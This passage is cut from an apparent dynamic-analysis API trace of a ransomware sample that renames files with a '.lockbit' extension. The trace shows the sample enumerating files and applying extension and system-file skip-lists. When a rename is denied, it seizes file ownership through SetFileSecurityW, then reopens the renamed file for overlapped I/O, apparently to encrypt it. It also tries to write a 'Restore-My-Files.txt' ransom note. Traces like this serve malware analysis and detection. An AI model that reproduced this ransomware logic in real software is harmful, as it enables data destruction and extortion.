Shared\\ink\\hwrlatinlm.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0091.581] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0091.581] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0091.581] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0091.581] lstrcmpiW (lpString1=".", lpString2="hwruklm.dat") returned -1 [0091.581] lstrcmpiW (lpString1="..", lpString2="hwruklm.dat") returned -1 [0091.581] PathFindExtensionW (pszPath="hwruklm.dat") returned=".dat" [0091.581] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0091.581] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0091.581] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0091.581] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0091.581] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0091.581] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0091.581] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0091.581] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0091.582] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0091.582] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0091.582] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0091.583] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0091.583] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwruklm.dat") returned 1 [0091.583] lstrcmpiW (lpString1="ntldr", lpString2="hwruklm.dat") returned 1 [0091.583] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwruklm.dat") returned 1 [0091.583] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwruklm.dat") returned -1 [0091.583] lstrcmpiW (lpString1="autorun.inf", lpString2="hwruklm.dat") returned -1 [0091.583] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0091.583] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned=".dat" [0091.583] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0091.583] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0091.583] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0091.583] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0091.583] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0091.584] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0091.584] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.lockbit") returned 71 [0091.584] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0091.584] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.lockbit")) returned 0 [0091.752] GetLastError () returned 0x5 [0091.752] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0095.148] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0095.148] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.148] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0095.149] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0095.149] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3b8, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0095.151] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0095.151] NtQueryInformationFile (in: FileHandle=0x3b8, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0095.168] NtClose (Handle=0x3b8) returned 0x0 [0095.168] RtlFreeAnsiString (AnsiString="\\") [0095.168] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3b8) returned 1 [0095.168] malloc (_Size=0x200) returned 0x53fcc0 [0095.168] GetTokenInformation (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0095.168] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.169] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.169] CloseHandle (hObject=0x3b8) returned 1 [0095.169] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0095.170] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0095.170] free (_Block=0x53fcc0) [0095.170] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0095.170] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.lockbit")) returned 1 [0095.171] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0095.172] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0095.172] malloc (_Size=0x40068) returned 0x20abae0 [0095.172] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=3053984) returned 1 [0095.172] ReadFile (in: hFile=0x3b8, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0095.174] GetLastError () returned 0x3e5 [0095.174] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0095.174] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0095.174] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.175] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0095.175] lstrcmpiW (lpString1=".", lpString2="hwruksh.dat") returned -1 [0095.175] lstrcmpiW (lpString1="..", lpString2="hwruksh.dat") returned -1 [0095.175] PathFindExtensionW (pszPath="hwruksh.dat") returned=".dat" [0095.175] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0095.175] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0095.175] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0095.175] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0095.175] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0095.175] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".nls", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".diagcab", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".lock", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".ocx", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".mpa", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".cpl", lpString2=".dat") returned -1 [0095.175] lstrcmpiW (lpString1=".mod", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".hta", lpString2=".dat") returned 1 [0095.175] lstrcmpiW (lpString1=".icns", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".prf", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".rtp", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".diagcfg", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".msstyles", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".bin", lpString2=".dat") returned -1 [0095.176] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".shs", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".drv", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".wpx", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".bat", lpString2=".dat") returned -1 [0095.176] lstrcmpiW (lpString1=".rom", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".msc", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".spl", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".ps1", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".msu", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".ics", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".key", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".mp3", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".reg", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".dll", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".ini", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".idx", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".sys", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".hlp", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".ico", lpString2=".dat") returned 1 [0095.176] lstrcmpiW (lpString1=".lnk", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".rdp", lpString2=".dat") returned 1 [0095.177] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0095.177] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="hwruksh.dat") returned 1 [0095.177] lstrcmpiW (lpString1="ntldr", lpString2="hwruksh.dat") returned 1 [0095.177] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="hwruksh.dat") returned 1 [0095.177] lstrcmpiW (lpString1="bootsect.bak", lpString2="hwruksh.dat") returned -1 [0095.177] lstrcmpiW (lpString1="autorun.inf", lpString2="hwruksh.dat") returned -1 [0095.177] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0095.177] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned=".dat" [0095.177] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".7z", lpString2=".dat") returned -1 [0095.177] lstrcmpiW (lpString1=".ckp", lpString2=".dat") returned -1 [0095.177] lstrcmpiW (lpString1=".dacpac", lpString2=".dat") returned -1 [0095.177] lstrcmpiW (lpString1=".db", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".db-shm", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".db-wal", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".db3", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".dbc", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".dbs", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".dbt", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".dbv", lpString2=".dat") returned 1 [0095.177] lstrcmpiW (lpString1=".frm", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".mdf", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".mrg", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".mwb", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".myd", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".ndf", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".qry", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".sdb", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".sdf", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".sql", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".sqlite", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".sqlite3", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".sqlitedb", lpString2=".dat") returned 1 [0095.178] lstrcmpiW (lpString1=".tmd", lpString2=".dat") returned 1 [0095.178] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.lockbit") returned 71 [0095.178] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0095.178] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.lockbit")) returned 0 [0095.178] GetLastError () returned 0x5 [0095.179] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0095.179] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0095.179] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0095.179] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0095.179] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0095.179] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3c0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0095.180] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0095.180] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0095.311] NtClose (Handle=0x3c0) returned 0x0 [0095.311] RtlFreeAnsiString (AnsiString="\\") [0095.311] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3c0) returned 1 [0095.311] malloc (_Size=0x200) returned 0x53fcc0 [0095.311] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0095.311] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.312] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0095.312] CloseHandle (hObject=0x3c0) returned 1 [0095.312] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0095.315] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0095.316] free (_Block=0x53fcc0) [0095.316] lstrcmpiW (lpString1=".dat", lpString2=".lockbit") returned -1 [0095.316] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.lockbit")) returned 1 [0095.317] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0095.317] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0095.317] malloc (_Size=0x40068) returned 0x206b860 [0095.317] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=2227968) returned 1 [0095.317] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0095.324] GetLastError () returned 0x3e5 [0095.324] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0095.324] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0095.324] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0095.324] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0095.324] lstrcmpiW (lpString1=".", lpString2="hwrusalm.dat") returned -1 [0095.324] lstrcmpiW (lpString1="..", lpString2="hwrusalm.dat") returned -1 [0095.325] PathFindExtensionW (pszPath="hwrusalm.dat") returned=".dat" [0095.325] lstrcmpiW (lpString1=".386", lpString2=".dat") returned -1 [0095.325] lstrcmpiW (lpString1=".cmd", lpString2=".dat") returned -1 [0095.325] lstrcmpiW (lpString1=".exe", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".ani", lpString2=".dat") returned -1 [0095.325] lstrcmpiW (lpString1=".adv", lpString2=".dat") returned -1 [0095.325] lstrcmpiW (lpString1=".theme", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".msi", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".msp", lpString2=".dat") returned 1 [0095.325] lstrcmpiW (lpString1=".com", lpString2=".dat") returned -1 [0095.325] lstrcmpiW (lpString1=".diagpkg", lpString2=".dat") returned 